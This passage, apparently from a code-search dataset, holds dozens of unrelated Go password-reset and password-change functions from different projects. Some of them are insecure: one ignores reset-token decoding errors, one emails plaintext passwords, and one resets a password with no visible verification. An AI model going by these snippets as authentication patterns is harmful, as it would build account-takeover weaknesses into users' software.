bcrypt.GenerateFromPassword([]byte(data[\"password\"]), 14)\n\n\tdatabase.DB.Model(&models.User{}).Where(\"email = ?\", passwordReset.Email).Update(\"password\", password)\n\n\treturn c.JSON(fiber.Map{\n\t\t\"message\": \"Password reset successful\",\n\t})\n\n}", "func (a *Admin) ResetPassword(newPassword string) error {\n\tall := a.Connections().GetAll()\n\tif len(all) == 0 {\n\t\treturn fmt.Errorf(\"no connection for other redis-node found\")\n\t}\n\tfor addr, c := range a.Connections().GetAll() {\n\t\ta.log.Info(\"reset password\", \"addr\", addr)\n\t\tsetMasterauth := c.Cmd(\"CONFIG\", \"SET\", \"masterauth\", newPassword)\n\t\tif err := a.Connections().ValidateResp(setMasterauth, addr, \"cannot set new masterauth\"); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tsetPasswdResp := c.Cmd(\"CONFIG\", \"SET\", \"requirepass\", newPassword)\n\t\tif err := a.Connections().ValidateResp(setPasswdResp, addr, \"cannot set new requirepass\"); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (UserService) ResetPassword(gDto dto.GeneralGetDto) string {\n\tsalt, _ := account.MakeSalt()\n\t//pwd, _ := account.HashPassword(dto.Password, salt)\n\tu := userDao.Get(gDto.Id, false)\n\tautoPwd := utils.RandomPwd(10)\n\tpwd, _ := account.HashPassword(autoPwd, salt)\n\t//u.Password = pwd\n\t//u.Salt = salt\n\tuserDao.Update(&u, map[string]interface{}{\n\t\t\"password\": pwd,\n\t\t\"salt\": salt,\n\t})\n\treturn autoPwd\n}", "func (h *UserRepos) ResetPassword(ctx context.Context, w http.ResponseWriter, r *http.Request, params map[string]string) error {\n\n\tctxValues, err := webcontext.ContextValues(ctx)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t//\n\treq := new(user.UserResetPasswordRequest)\n\tdata := make(map[string]interface{})\n\tf := func() error {\n\n\t\tif r.Method == http.MethodPost {\n\t\t\terr := r.ParseForm()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tdecoder := schema.NewDecoder()\n\t\t\tif err := decoder.Decode(req, r.PostForm); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t_, err = h.UserRepo.ResetPassword(ctx, *req, ctxValues.Now)\n\t\t\tif err != nil {\n\t\t\t\tswitch errors.Cause(err) {\n\t\t\t\tdefault:\n\t\t\t\t\tif verr, ok := weberror.NewValidationError(ctx, err); ok {\n\t\t\t\t\t\tdata[\"validationErrors\"] = verr.(*weberror.Error)\n\t\t\t\t\t\treturn nil\n\t\t\t\t\t} else {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// Display a success message to the user to check their email.\n\t\t\twebcontext.SessionFlashSuccess(ctx,\n\t\t\t\t\"Check your email\",\n\t\t\t\tfmt.Sprintf(\"An email was sent to '%s'. Click on the link in the email to finish resetting your password.\", req.Email))\n\n\t\t}\n\n\t\treturn nil\n\t}\n\n\tif err := f(); err != nil {\n\t\treturn web.RenderError(ctx, w, r, err, h.Renderer, TmplLayoutBase, TmplContentErrorGeneric, web.MIMETextHTMLCharsetUTF8)\n\t}\n\n\tdata[\"form\"] = req\n\n\tif verr, ok := weberror.NewValidationError(ctx, webcontext.Validator().Struct(user.UserResetPasswordRequest{})); ok {\n\t\tdata[\"validationDefaults\"] = verr.(*weberror.Error)\n\t}\n\n\treturn h.Renderer.Render(ctx, w, r, TmplLayoutBase, \"user-reset-password.gohtml\", web.MIMETextHTMLCharsetUTF8, http.StatusOK, data)\n}", "func (u *UserController) PasswordReset(c *gin.Context) {\n\tvar data forms.PasswordResetCommand\n\n\tif c.BindJSON(&data) != nil {\n\t\tc.JSON(406, gin.H{\"message\": \"Provide relevant fields\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tif data.Password != data.Confirm {\n\t\tc.JSON(400, gin.H{\"message\": \"Passwords do not match\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tresetToken, _ := c.GetQuery(\"reset_token\")\n\n\tuserID, _ := services.DecodeNonAuthToken(resetToken)\n\n\tresult, err := userModel.GetUserByEmail(userID)\n\n\tif err != nil {\n\t\t// Return response when we get an error while fetching user\n\t\tc.JSON(500, gin.H{\"message\": \"Something wrong happened, try again later\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tif result.Email == \"\" {\n\t\tc.JSON(404, gin.H{\"message\": \"User accoun was not found\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\t// Hash the new password\n\tnewHashedPassword := helpers.GeneratePasswordHash([]byte(data.Password))\n\n\t// Update user account\n\t_err := userModel.UpdateUserPass(userID, newHashedPassword)\n\n\tif _err != nil {\n\t\t// Return response if we are not able to update user password\n\t\tc.JSON(500, gin.H{\"message\": \"Somehting happened while updating your password try again\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tc.JSON(201, gin.H{\"message\": \"Password has been updated, log in\"})\n\tc.Abort()\n\treturn\n}", "func ResetPassword(db db.Storer, email, tok, newpass string) error {\n\tvalid, err := verifyResetToken(db, email, tok)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif !valid {\n\t\treturn fmt.Errorf(\"Invalid reset token\")\n\t}\n\n\tuser, err := GetUserWithEmail(db, email)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif Ispasswordmatchwithprevfivepass(db, user.UserID, newpass) {\n\t\treturn errors.New(\"History says that you have used this new password in the past\")\n\t}\n\n\treturn UpdatePassword(db, user.UserID, newpass)\n}", "func (c *RegistrationController) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\n\t// parse the form value\n\tif err := r.ParseForm(); err != nil {\n\t\tlog.Println(err)\n\t\tc.Error500(w, err, \"Parsing form values failed.\")\n\t\treturn\n\t}\n\n\tdisplayedError := \"Error resetting password\"\n\n\tuserEmail := r.FormValue(\"userEmail\")\n\tu, err := models.FindUserByEmail(userEmail)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\tc.BadRequest(w, err, displayedError)\n\t\treturn\n\t}\n\n\tif err = u.ResetUUID(); err != nil {\n\t\tlog.Printf(\"Error resetting UUID for user %v: %v\", u.Email, err)\n\t\tc.BadRequest(w, err, displayedError)\n\t\treturn\n\t}\n\tif err = u.UpdatePassword(\"\"); err != nil {\n\t\tlog.Printf(\"Error resetting password for user %v: %v\", u.Email, err)\n\t\tc.BadRequest(w, err, displayedError)\n\t\treturn\n\t}\n\tdata := email.MailData{\n\t\tFirstName: u.FirstName,\n\t\tLastName: u.LastName,\n\t\tHostAddress: config.HTTPHostAddress,\n\t\tVerificationUUID: u.VerificationUUID,\n\t}\n\tif err = email.ConstructFromTemplateAndSend(\n\t\t\"password_reset.html\",\n\t\t\"[SCIONLab] Password reset\",\n\t\tdata,\n\t\t\"password-reset\",\n\t\tuserEmail,\n\t\tfalse); err != nil {\n\t\tlog.Printf(\"Error sending password-reset email to user %v: %v\", u.Email, err)\n\t\tc.BadRequest(w, err, displayedError)\n\t\treturn\n\t}\n\n\treturn\n}", "func resetPassword(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\n\t// take email, token and new password\n\tbody := struct {\n\t\tEmail string `json:\"email\"`\n\t\tOTP string `json:\"otp\"`\n\t\tPassword string `json:\"password\"`\n\t}{}\n\n\terr := json.NewDecoder(r.Body).Decode(&body)\n\tlog.ErrorHandler(err)\n\n\t// check email for existence\n\tvar user User\n\terr = db.Find(&user, \"email = ?\", body.Email).Error\n\tif errors.Is(err, gorm.ErrRecordNotFound) {\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\tlog.ErrorHandler(err)\n\t\terr = json.NewEncoder(w).Encode(core.FourOOne)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 401)\n\t\treturn\n\t}\n\n\t// check if token exists\n\tstoredOtp, err := redisClient.Get(ctx, \"password_reset_\"+body.Email).Result()\n\tlog.ErrorHandler(err)\n\n\tif storedOtp != body.OTP {\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\terr = json.NewEncoder(w).Encode(core.FourOOne)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 401)\n\t\treturn\n\t}\n\n\t// validate password\n\tsafePassword := passwordValidator(body.Password)\n\tif !safePassword {\n\t\tw.WriteHeader(http.StatusUnprocessableEntity)\n\t\terr = json.NewEncoder(w).Encode(core.FourTwoTwo)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 422)\n\t\treturn\n\t}\n\n\t// Generate password hash and save\n\thashedPassword, err := generatePasswordHash(body.Password)\n\tlog.ErrorHandler(err)\n\n\tuser.Password = hashedPassword\n\tdb.Save(&user)\n\n\tw.WriteHeader(http.StatusOK)\n\terr = json.NewEncoder(w).Encode(core.TwoHundred)\n\tlog.ErrorHandler(err)\n\tlog.AccessHandler(r, 200)\n\n\t// Delete from redis\n\tredisClient.Del(ctx, \"password_reset_\"+body.Email)\n\n\treturn\n}", "func (self *Apn) ResetPassword(rw web.ResponseWriter, req *web.Request) {\n\tif req.Method != \"POST\" {\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\tokPacket := &packet.OkPacket{}\n\n\tbody, err := ioutil.ReadAll(req.Body)\n\tif err != nil {\n\t\tlog.Error(\"read request error\", err)\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\tmodifyPacket := &SignInUp{}\n\terr = json.Unmarshal(body, &modifyPacket)\n\tif err != nil {\n\t\tlog.Error(\"decode the json packet error:\", err)\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\tif !modifyPacket.IsValid() {\n\t\tokPacket.Code = 0\n\t\tokPacket.Message = \"request parms is invalid\"\n\t\trw.Write(xjson.Encode(okPacket))\n\t\treturn\n\t}\n\n\tif registered := user.IsUsernameRegistered(modifyPacket.UserName); !registered {\n\t\tokPacket.Code = 0\n\t\tokPacket.Message = \"username has not registered\"\n\t\trw.Write(xjson.Encode(okPacket))\n\t\treturn\n\t}\n\n\tuser.ModifyPassword(modifyPacket.Phone, modifyPacket.Password)\n\n\tuserId := user.GetUserIdByUserName(modifyPacket.UserName)\n\tif userId == 0 {\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\t//delete the session, because user change the password\n\tsession.DeleteSessionByUserId(userId)\n\n\tokPacket.Code = 1\n\tSuccess(rw)\n\trw.Write(xjson.Encode(okPacket))\n\n}", "func (context *DbContext) ResetPassword(username string, recoveryToken string, newPassword string) ConnectUserResponse {\n\n\tid := context.IDFromUsername(username)\n\tif id == 0 {\n\t\treturn invalidConnectUserResponse()\n\t}\n\n\tif !ValidatePassword(newPassword) {\n\t\treturn invalidConnectUserResponse()\n\t}\n\n\tstmt, err := context.Db.Prepare(\"SELECT Expiration FROM UserRecoveryTokens WHERE IdUser = ? AND Token = ?\")\n\tcheckErr(err)\n\tdefer stmt.Close()\n\n\tvar expiration time.Time\n\terr = stmt.QueryRow(id, recoveryToken).Scan(&expiration)\n\n\tif err == sql.ErrNoRows {\n\t\treturn invalidConnectUserResponse()\n\t}\n\tcheckErr(err)\n\n\tif time.Now().After(expiration) {\n\t\treturn invalidConnectUserResponse()\n\t}\n\n\tnewExpiration := time.Now()\n\n\tstmt2, err := context.Db.Prepare(\"UPDATE UserRecoveryTokens SET Expiration = ? WHERE IdUser = ? AND Token = ?\")\n\tcheckErr(err)\n\tdefer stmt2.Close()\n\n\t_, err = stmt2.Exec(newExpiration, id, recoveryToken)\n\n\t// Hashing the password with the default cost of 10\n\thashedPassword, err := bcrypt.GenerateFromPassword([]byte(context.saltPassword(newPassword)), bcrypt.DefaultCost)\n\tcheckErr(err)\n\n\tstmt3, err := context.Db.Prepare(\"UPDATE UserAuthentications SET Password = ? WHERE IdUser = ?\")\n\tcheckErr(err)\n\tdefer stmt.Close()\n\n\t_, err = stmt3.Exec(hashedPassword, id)\n\tcheckErr(err)\n\n\treturn context.ValidateCredentials(username, newPassword)\n}", "func (u *userService) ResetPassword(data dto.UserChangePasswordRequest) resterr.APIError {\n\tnewPasswordHash, err := u.crypto.GenerateHash(data.NewPassword)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdata.NewPassword = newPasswordHash\n\n\terr = u.dao.ChangePassword(data)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func ResetPassword(c *fiber.Ctx) error {\n\tvar req dto.PasswordReset\n\tevpw := c.Params(\"evpw\")\n\turl_email := c.Params(\"email\")\n\n\tif err := c.BodyParser(&req); err != nil {\n\t\tgetStatus(c, 422, err)\n\t} else {\n\t\tappErr := service.ResetPassword(req, evpw, url_email)\n\t\tif appErr.Status != true {\n\t\t\tgetStatus(c, 500, appErr)\n\t\t} else {\n\t\t\tgetStatus(c, 200, appErr)\n\t\t}\n\t}\n\treturn nil\n}", "func (u *UserTest) ResetPassword(password string) error {\n\treturn nil\n}", "func (d *MongoUserDao) ResetPassword(id int, passwordHash string) error {\n\tsession := d.Session.Clone()\n\tdefer session.Close()\n\n\tcollection := session.DB(d.DatabaseName).C(collectionName)\n\n\tupdateBody := bson.M{\"password\": passwordHash, \"resettingCode\": \"\"}\n\n\treturn collection.UpdateId(id, bson.M{\"$set\": updateBody})\n}", "func ResetPassword(w http.ResponseWriter, req *http.Request) {\n\t//log\n\tnow, userIP := globalPkg.GetIP(req)\n\n\tfound, logobj := logpkg.CheckIfLogFound(userIP)\n\n\tif found && now.Sub(logobj.Currenttime).Seconds() > globalPkg.GlobalObj.DeleteAccountTimeInseacond {\n\n\t\tlogobj.Count = 0\n\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\n\t}\n\tif found && logobj.Count >= 10 {\n\t\tresponseObj := responses.FindResponseByID(\"6\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\treturn\n\t}\n\n\tif !found {\n\n\t\tLogindex := userIP.String() + \"_\" + logfunc.NewLogIndex()\n\n\t\tlogobj = logpkg.LogStruct{Logindex, now, userIP, \"macAdress\", \"ResetPassword\", \"AccountModule\", \"_\", \"_\", \"_\", 0}\n\t} else {\n\t\tlogobj = logfunc.ReplaceLog(logobj, \"ResetPassword\", \"AccountModule\")\n\t}\n\tResetPasswordDataObj := ResetPasswordData{}\n\n\t// check on path url\n\texisturl := false\n\tfor _, resetObj := range resetPassReq {\n\t\tp := \"/\" + resetObj.PathAPI\n\n\t\tif req.URL.Path == p {\n\t\t\texisturl = true\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif existurl == false {\n\t\tresponseObj := responses.FindResponseByID(\"12\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\tlogobj.OutputData = \"this page is not found\"\n\t\tlogobj.Process = \"faild\"\n\t\tlogpkg.WriteOnlogFile(logobj)\n\t\tlogobj.Count = logobj.Count + 1\n\n\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\t\treturn\n\t}\n\n\tData := ResetPasswordData{}\n\tdecoder := json.NewDecoder(req.Body)\n\tdecoder.DisallowUnknownFields()\n\terr := decoder.Decode(&ResetPasswordDataObj)\n\tif err != nil {\n\t\tresponseObj := responses.FindResponseByID(\"1\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, responseObj.EngResponse, \"failed\")\n\n\t\treturn\n\t}\n\tInputData := Data.Email\n\tlogobj.InputData = InputData\n\t//email is lowercase\n\tResetPasswordDataObj.Email = convertStringTolowerCaseAndtrimspace(ResetPasswordDataObj.Email)\n\tvar AccountObj accountdb.AccountStruct\n\ti, found := findInResetPassPool(ResetPasswordDataObj)\n\n\tif found == false {\n\t\tresponseObj := responses.FindResponseByID(\"104\")\n\t\tglobalPkg.SendNotFound(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, \"invalid data\", \"failed\")\n\t\tlogobj.OutputData = \"Invalid Data\"\n\t\tlogobj.Process = \"failed\"\n\t\tlogobj.Count = logobj.Count + 1\n\n\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\n\t\treturn\n\n\t}\n\t//Data should be removed from list\n\tData = resetPassReq[i]\n\n\tif len(ResetPasswordDataObj.Newpassword) != 64 {\n\t\tresponseObj := responses.FindResponseByID(\"7\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, \"invalid password length \", \"failed\")\n\t\treturn\n\t}\n\tsub := now.Sub(Data.CurrentTime).Seconds()\n\tif sub > 3000 {\n\t\tresponseObj := responses.FindResponseByID(\"8\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\tlogobj.OutputData = \"Time out \"\n\t\tlogobj.Process = \"faild\"\n\t\tglobalPkg.WriteLog(logobj, \"time out\", \"failed\")\n\t\tlogobj.Count = logobj.Count + 1\n\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\t\treturn\n\t}\n\tif ResetPasswordDataObj.Email != \"\" {\n\t\tAccountObj = getAccountByEmail(ResetPasswordDataObj.Email)\n\t\tAccountObj.AccountPassword = ResetPasswordDataObj.Newpassword\n\t\tAccountObj.AccountLastUpdatedTime = now\n\t\tbroadcastTcp.BoardcastingTCP(AccountObj, \"Resetpass\", \"account\")\n\t\tresponseObj := responses.FindResponseByID(\"9\")\n\t\tglobalPkg.SendResponseMessage(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, \"your password successfully changed\", \"success\")\n\n\t\tif logobj.Count > 0 {\n\t\t\tlogobj.OutputData = \"your password successfully changed\"\n\t\t\tlogobj.Process = \"success\"\n\t\t\tlogobj.Count = 0\n\n\t\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\t\t}\n\t\treturn\n\t}\n\n\tif ResetPasswordDataObj.Phonnum != \"\" {\n\t\tAccountObj = getAccountByPhone(ResetPasswordDataObj.Email)\n\t\tAccountObj.AccountPassword = ResetPasswordDataObj.Newpassword\n\t\tAccountObj.AccountLastUpdatedTime = now\n\t\tbroadcastTcp.BoardcastingTCP(AccountObj, \"Resetpass\", \"account\") //\tupdateAccount(AccountObj)\n\t\tresponseObj := responses.FindResponseByID(\"9\")\n\t\tglobalPkg.SendResponseMessage(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, \"your password successfully changed\", \"success\")\n\t\tif logobj.Count > 0 {\n\t\t\tlogobj.OutputData = \"your password successfully changed\"\n\t\t\tlogobj.Process = \"success\"\n\t\t\tlogobj.Count = 0\n\n\t\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\t\t}\n\t\treturn\n\t}\n\n}", "func (u *Users) ResetPw(w http.ResponseWriter, r *http.Request) {\n\tvar vd views.Data\n\tvar form ResetPwForm\n\tvd.Yield = &form\n\tif err := parseURLParams(r, &form); err != nil {\n\t\tvd.SetAlert(err)\n\t}\n\tu.ResetPwView.Render(w, r, vd)\n}", "func (c *Client) ResetPassword(uid string) (string, error) {\n\n\toptions := map[string]interface{}{\n\t\t\"no_members\": false,\n\t\t\"random\": true,\n\t\t\"all\": true}\n\n\tres, err := c.rpc(\"user_mod\", []string{uid}, options)\n\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tvar userRec UserRecord\n\terr = json.Unmarshal(res.Result.Data, &userRec)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif len(userRec.Randompassword) == 0 {\n\t\treturn \"\", errors.New(\"ipa: failed to reset user password. empty random password returned\")\n\t}\n\n\treturn userRec.Randompassword, nil\n}", "func (s *UsersService) ResetPassword(ctx context.Context, realm, userID string, credential *Credential) (*http.Response, error) {\n\tu := fmt.Sprintf(\"admin/realms/%s/users/%s/reset-password\", realm, userID)\n\treq, err := s.keycloak.NewRequest(http.MethodPut, u, credential)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn s.keycloak.Do(ctx, req, nil)\n}", "func (ah *AuthHandler) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\n\tpassResetReq := &PasswordResetReq{}\n\terr := data.FromJSON(passResetReq, r.Body)\n\tif err != nil {\n\t\tah.logger.Error(\"unable to decode password reset request json\", \"error\", err.Error())\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: err.Error()}, w)\n\t\treturn\n\t}\n\n\tuserID := r.Context().Value(UserIDKey{}).(string)\n\tuser, err := ah.repo.GetUserByID(context.Background(), userID)\n\tif err != nil {\n\t\tah.logger.Error(\"unable to retrieve the user from db\", \"error\", err)\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Unable to reset password. Please try again later\"}, w)\n\t\treturn\n\t}\n\n\tverificationData, err := ah.repo.GetVerificationData(context.Background(), user.Email, data.PassReset)\n\tif err != nil {\n\t\tah.logger.Error(\"unable to retrieve the verification data from db\", \"error\", err)\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Unable to reset password. Please try again later\"}, w)\n\t\treturn\n\t}\n\n\tif verificationData.Code != passResetReq.Code {\n\t\t// we should never be here.\n\t\tah.logger.Error(\"verification code did not match even after verifying PassReset\")\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Unable to reset password. Please try again later\"}, w)\n\t\treturn\n\t}\n\n\tif passResetReq.Password != passResetReq.PasswordRe {\n\t\tah.logger.Error(\"password and password re-enter did not match\")\n\t\tw.WriteHeader(http.StatusNotAcceptable)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Password and re-entered Password are not same\"}, w)\n\t\treturn\n\t}\n\n\thashedPass, err := ah.hashPassword(passResetReq.Password)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: UserCreationFailed}, w)\n\t\treturn\n\t}\n\n\ttokenHash := utils.GenerateRandomString(15)\n\terr = ah.repo.UpdatePassword(context.Background(), userID, hashedPass, tokenHash)\n\tif err != nil {\n\t\tah.logger.Error(\"unable to update user password in db\", \"error\", err)\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Password and re-entered Password are not same\"}, w)\n\t\treturn\n\t}\n\n\t// delete the VerificationData from db\n\terr = ah.repo.DeleteVerificationData(context.Background(), verificationData.Email, verificationData.Type)\n\tif err != nil {\n\t\tah.logger.Error(\"unable to delete the verification data\", \"error\", err)\n\t}\n\n\tw.WriteHeader(http.StatusOK)\n\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Password Reset Successfully\"}, w)\n}", "func ResetPassword() echo.HandlerFunc {\n\treturn func(context echo.Context) error {\n\t\tnewPassword := context.FormValue(\"password\")\n\t\tvar email string\n\t\tvar ok bool\n\t\tif email, ok = context.Get(\"email\").(string); !ok {\n\t\t\tlog.Println(\"Missing email in password reset request\")\n\t\t\treturn context.JSON(http.StatusUnauthorized, errors.New(\"Missing email in password reset request\"))\n\t\t}\n\t\tuser, err := FindByEmail(email)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Cannot find user during password reset: %v\\n\", err)\n\t\t\treturn context.JSON(http.StatusUnauthorized, errors.New(\"Wrong email in password reset request\"))\n\t\t}\n\n\t\thash, bcryptErr := bcrypt.GenerateFromPassword([]byte(newPassword), bcrypt.DefaultCost)\n\t\tif bcryptErr != nil {\n\t\t\tlog.Println(bcryptErr)\n\t\t\treturn context.JSON(http.StatusInternalServerError, errors.New(\"Server error. The password was not changed.\"))\n\t\t}\n\n\t\tuser.Hash = string(hash)\n\t\terr = Save(user)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t\treturn context.JSON(http.StatusInternalServerError, errors.New(\"Server error. The password was not changed.\"))\n\t\t}\n\n\t\treturn context.JSON(http.StatusOK, nil)\n\t}\n}", "func ChangeAdminPassword(client *gophercloud.ServiceClient, id, newPassword string) (r ActionResult) {\n\tb := map[string]interface{}{\n\t\t\"changePassword\": map[string]string{\n\t\t\t\"adminPass\": newPassword,\n\t\t},\n\t}\n\tresp, err := client.Post(actionURL(client, id), b, nil, nil)\n\t_, r.Header, r.Err = gophercloud.ParseResponse(resp, err)\n\treturn\n}", "func (us *UserStorage) ResetPassword(id, password string) error {\n\treturn nil\n}", "func (c *Config) UpdatePassword(w http.ResponseWriter, r *http.Request) {\n\tctx := r.Context()\n\n\tvar payload updatePasswordPayload\n\tif err := bjson.ReadJSON(&payload, r); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tif err := valid.Raw(&payload); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tu, err := c.UserStore.GetUserByID(ctx, payload.UserID)\n\tif err != nil {\n\t\tbjson.HandleError(w, errors.E(\n\t\t\terrors.Op(\"handlers.UpdatePassword\"),\n\t\t\terr,\n\t\t\thttp.StatusBadRequest))\n\n\t\treturn\n\t}\n\n\tif err := u.VerifyPasswordResetMagicLink(\n\t\tc.Magic,\n\t\tpayload.UserID,\n\t\tpayload.Timestamp,\n\t\tpayload.Signature,\n\t); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tif err := magic.TooOld(payload.Timestamp); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tu.ChangePassword(payload.Password)\n\tu.IsLocked = false\n\tu.AddEmail(u.Email)\n\tu.DeriveProperties()\n\n\tif err := c.UserStore.Commit(ctx, u); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tbjson.WriteJSON(w, u, http.StatusOK)\n}", "func UpdatePassword(w http.ResponseWriter, r *http.Request) {\n\tr.ParseForm()\n\tpasswords, err := json.Marshal(map[string]string{\n\t\t\"now\": r.FormValue(\"now\"),\n\t\t\"new\": r.FormValue(\"new\"),\n\t})\n\tif err != nil {\n\t\tresponses.JSON(w, http.StatusBadRequest, responses.ErrorAPI{Err: err.Error()})\n\t\treturn\n\t}\n\n\tcookie, _ := cookies.Read(r)\n\tuserID, _ := strconv.ParseUint(cookie[\"id\"], 10, 64)\n\n\turl := fmt.Sprintf(\"%s/users/%d/change-password\", config.APIURL, userID)\n\tresponse, err := requests.RequestsWithAuthentication(r, http.MethodPost, url, bytes.NewBuffer(passwords))\n\tif err != nil {\n\t\tresponses.JSON(w, http.StatusInternalServerError, responses.ErrorAPI{Err: err.Error()})\n\t\treturn\n\t}\n\tdefer response.Body.Close()\n\n\tif response.StatusCode >= 400 {\n\t\tresponses.TreatStatusCode(w, response)\n\t\treturn\n\t}\n\n\tresponses.JSON(w, response.StatusCode, nil)\n}", "func ResetPassword(u datastore.User) {\n\n\tbody := `<h3>Hi, %s!</h3>\n\t\t\t <p>The link below will allow you to reset your password.</p>\n <p>If you didn't ask for this you can ignore this email.</p>\n\t\t\t <p><a href=\"%s\" target=\"_blank\">Reset my password</a></p>\n\t\t\t <p>Happy RTCL-ing</p>`\n\tlink := os.Getenv(\"API_URL\") + \"/users/\" + u.ID.Hex() + \"/reset/\" + u.KeyGen()\n\tbody = fmt.Sprintf(body, u.FirstName, link)\n\n\te := New()\n\te.FromEmail = \"[email protected]\"\n\te.FromName = \"RTCL Notifier\"\n\te.Subject = \"RTCL password reset\"\n\te.ToEmail = u.Email\n\te.ToName = u.FirstName + \" \" + u.LastName\n\te.PlainContent = \"Password reset link: \" + link\n\te.HTMLContent = body\n\te.Send()\n}", "func (a *Account) ResetPassword() (*Account, *http.Response, []error) {\n\tk := kumoru.New()\n\n\tk.Get(fmt.Sprintf(\"%v/v1/accounts/%v/password/resets/\", k.EndPoint.Authorization, a.Email))\n\tresp, _, errs := k.End()\n\n\treturn a, resp, errs\n}", "func resetpassword(email, newpass string) error {\n\tm := gomail.NewMessage()\n\tm.SetHeader(\"From\", mailfrom)\n\tm.SetHeader(\"To\", email)\n\tm.SetHeader(\"Subject\", \"Changement de mot de passe\")\n\tm.SetBody(\"text/plain\", \"Ton nouveau mot de passe est: \"+newpass)\n\n\td := gomail.NewDialer(smtpserver, smtpport, \"\", \"\")\n\n\tif err := d.DialAndSend(m); err != nil {\n\t\treturn errors.New(\"Connexion impossible avec le serveur smtp\")\n\t}\n\treturn nil\n}", "func Test_ResetPassword(t *testing.T) {\n\tuser, _ := NewUserPwd(defaultPassword, defaultSaltStr)\n\ttPwd, _ := salt.GenerateSaltedPassword(defaultPassword, MinPasswordLength, MaxPasswordLength, user.Salt, -1)\n\tpass := GetHashedPwd(tPwd)\n\terr := user.IsPasswordMatch(pass)\n\tif err != nil {\n\t\tt.Errorf(\"Test fail: correct password: '%v', return an error: %v\", pass, err)\n\t}\n\ttmpPwd, err := user.ResetPasword()\n\tif err != nil {\n\t\tt.Errorf(\"Test fail: Reset password fail, error: %v\", err)\n\t}\n\ttPwd, _ = salt.GenerateSaltedPassword(tmpPwd, MinPasswordLength, MaxPasswordLength, user.Salt, -1)\n\tnewPwd := GetHashedPwd(tPwd)\n\terr = user.IsPasswordMatch(pass)\n\tif err == nil {\n\t\tt.Errorf(\"Test fail: Old password: '%v' accepted\", pass)\n\t}\n\terr = user.IsPasswordMatch(newPwd)\n\tif err != nil {\n\t\tt.Errorf(\"Test fail: The new automatic generated password: '%v' was not accepted, error: %v\", newPwd, err)\n\t}\n\terr = user.IsPasswordMatch(pass)\n\tif err == nil {\n\t\tt.Errorf(\"Test fail: The one time pwd: '%v' accepted twice\", 